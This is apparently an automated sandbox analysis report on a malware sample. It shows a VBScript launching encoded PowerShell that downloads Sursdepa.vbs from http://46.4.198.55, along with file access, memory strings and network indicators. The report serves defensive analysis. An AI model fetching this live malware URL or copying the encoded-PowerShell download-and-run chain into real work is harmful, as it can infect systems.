Source: http://46.4.198.55 |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.vbsh |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.vbs |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~ |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$ |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.vbs0yj |
Avira URL Cloud: Label: malware |
Source: http://46.4.198.55/10P/Sursdepa.v |
Avira URL Cloud: Label: malware |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData |
Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q1 |
Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete |
Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX |
Source: global traffic |
HTTP traffic detected: GET /10P/Sursdepa.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 46.4.198.55Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.4.198.55 |
Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55 |
Source: powershell.exe, 00000003.00000002.292149897.00000167E848D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.v |
Source: powershell.exe, 00000003.00000002.295924482.00000167E855C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282654233.00000167E5B98000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs |
Source: powershell.exe, 00000003.00000002.282555129.00000167E5B10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs |
Source: powershell.exe, 00000003.00000002.301030775.00000167FFDE7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281332697.00000167FFDE2000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$ |
Source: powershell.exe, 00000003.00000002.282784282.00000167E5E50000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~ |
Source: powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs0yj |
Source: powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbsh |
Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://46.4.198.55x |
Source: powershell.exe, 00000001.00000002.335374156.00000211CEF07000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.300317707.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281232280.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.528421591.0000000002D8B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000001.00000002.323271463.00000211B7732000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://go.micros |
Source: powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000001.00000002.318892077.00000211B6EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282944131.00000167E7731000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.298249127.00000167E8C5F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.300436047.00000167FFC19000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281286699.00000167FFC19000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://go.microsoft.co |
Source: powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "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 |